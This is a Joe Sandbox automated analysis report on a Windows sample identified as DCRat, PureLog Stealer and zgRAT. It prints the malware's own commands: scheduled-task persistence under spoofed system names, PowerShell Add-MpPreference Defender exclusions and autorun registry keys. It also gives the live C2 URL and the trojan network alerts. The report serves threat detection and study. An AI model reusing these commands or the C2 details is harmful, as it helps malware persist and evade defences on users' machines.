Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WinPerfcommon.exe

Overview

General Information

Sample name:WinPerfcommon.exe
Analysis ID:1589192
MD5:6b9554367a439d39a00a0dff9a08b123
SHA1:e1d22cde90c297c10f4fcba5b3980e5d551eb0b3
SHA256:3332277b9e53375e998ccf981cdb0519fea7721b5e79a3d7a60b83f448f6c0a9
Tags:DCRatexeNyashTeamuser-MalHunter1
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • WinPerfcommon.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\WinPerfcommon.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
    • csc.exe (PID: 7108 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 2084 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6064 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5432 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6128 cmdline: schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1704 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6448 cmdline: schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7044 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5012 cmdline: schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7104 cmdline: schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6928 cmdline: schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3620 cmdline: schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7056 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 5752 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6064 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7880 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4304 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5300 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7352 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7600 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7724 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • pzPgKRlGoglDaRzDTBMXwbN.exe (PID: 8004 cmdline: "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
        • cmd.exe (PID: 1052 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7244 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • SgrmBroker.exe (PID: 4428 cmdline: C:\Recovery\SgrmBroker.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SgrmBroker.exe (PID: 7316 cmdline: C:\Recovery\SgrmBroker.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7524 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7548 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SystemSettings.exe (PID: 7560 cmdline: C:\Recovery\SystemSettings.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • SystemSettings.exe (PID: 7592 cmdline: C:\Recovery\SystemSettings.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7676 cmdline: C:\Users\user\Desktop\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • WinPerfcommon.exe (PID: 7824 cmdline: C:\Users\user\Desktop\WinPerfcommon.exe MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • StartMenuExperienceHost.exe (PID: 7100 cmdline: "C:\Program Files\Adobe\StartMenuExperienceHost.exe" MD5: 6B9554367A439D39A00A0DFF9A08B123)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
WinPerfcommon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    WinPerfcommon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\SystemSettings.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\SystemSettings.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Adobe\StartMenuExperienceHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Adobe\StartMenuExperienceHost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1682029675.0000000000302000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Process Memory Space: WinPerfcommon.exe PID: 6664JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: pzPgKRlGoglDaRzDTBMXwbN.exe PID: 8004JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: StartMenuExperienceHost.exe PID: 7100JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.WinPerfcommon.exe.300000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.WinPerfcommon.exe.300000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7108, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Adobe\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Adobe\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", ProcessId: 7108, ProcessName: csc.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\WinPerfcommon.exe, ProcessId: 6664, TargetFilename: C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe', ProcessId: 5752, ProcessName: powershell.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\WinPerfcommon.exe", ParentImage: C:\Users\user\Desktop\WinPerfcommon.exe, ParentProcessId: 6664, ParentProcessName: WinPerfcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline", ProcessId: 7108, ProcessName: csc.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-11T16:20:13.961527+010020480951A Network Trojan was detected192.168.2.44973037.44.238.25080TCP
                              2025-01-11T16:20:26.445916+010020480951A Network Trojan was detected192.168.2.44973737.44.238.25080TCP
                              2025-01-11T16:20:52.946036+010020480951A Network Trojan was detected192.168.2.46217537.44.238.25080TCP
                              2025-01-11T16:21:01.242843+010020480951A Network Trojan was detected192.168.2.46219637.44.238.25080TCP
                              2025-01-11T16:21:05.430363+010020480951A Network Trojan was detected192.168.2.46221837.44.238.25080TCP
                              2025-01-11T16:21:11.211605+010020480951A Network Trojan was detected192.168.2.46225437.44.238.25080TCP
                              2025-01-11T16:21:14.045793+010020480951A Network Trojan was detected192.168.2.46227037.44.238.25080TCP
                              2025-01-11T16:21:17.906639+010020480951A Network Trojan was detected192.168.2.46229537.44.238.25080TCP
                              2025-01-11T16:21:38.508513+010020480951A Network Trojan was detected192.168.2.46241037.44.238.25080TCP
                              2025-01-11T16:22:05.602307+010020480951A Network Trojan was detected192.168.2.46244737.44.238.25080TCP
                              2025-01-11T16:22:14.336703+010020480951A Network Trojan was detected192.168.2.46244837.44.238.25080TCP
                              2025-01-11T16:22:17.243019+010020480951A Network Trojan was detected192.168.2.46244937.44.238.25080TCP
                              2025-01-11T16:22:23.336697+010020480951A Network Trojan was detected192.168.2.46245037.44.238.25080TCP
                              2025-01-11T16:22:25.793218+010020480951A Network Trojan was detected192.168.2.46245137.44.238.25080TCP
                              2025-01-11T16:22:28.539834+010020480951A Network Trojan was detected192.168.2.46245237.44.238.25080TCP
                              2025-01-11T16:22:31.033553+010020480951A Network Trojan was detected192.168.2.46245337.44.238.25080TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: WinPerfcommon.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://fsin.top/javascriptCentraldownloads.phpAvira URL Cloud: Label: phishing
                              Source: http://fsin.top/Avira URL Cloud: Label: phishing
                              Source: http://fsin.topAvira URL Cloud: Label: phishing
                              Antivirus detection for dropped file
                              Source: C:\Recovery\SgrmBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Recovery\SystemSettings.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://fsin.top/javascriptCentraldownloads", "MUTEX": "DCR_MUTEX-nQmtb0EsMA9tAW54k3K0", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeReversingLabs: Detection: 63%
                              Source: C:\Recovery\SgrmBroker.exeReversingLabs: Detection: 63%
                              Source: C:\Recovery\SystemSettings.exeReversingLabs: Detection: 63%
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\Desktop\GKMojBlr.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\PipMsYLy.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\PoUdTuAY.logReversingLabs: Detection: 33%
                              Source: C:\Users\user\Desktop\YLyBcRbf.logReversingLabs: Detection: 33%
                              Source: C:\Users\user\Desktop\fyKARhRs.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\iFHJmzLo.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\izcrMdWN.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\yHNOGCAC.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\zGtWfQBc.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\zsLwvutf.logReversingLabs: Detection: 25%
                              Source: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exeReversingLabs: Detection: 63%
                              Multi AV Scanner detection for submitted file
                              Source: WinPerfcommon.exeReversingLabs: Detection: 63%
                              Source: WinPerfcommon.exeVirustotal: Detection: 70%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Recovery\SgrmBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\GEhWIfwR.logJoe Sandbox ML: detected
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\SystemSettings.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\EAqnjiFq.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: WinPerfcommon.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":""},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
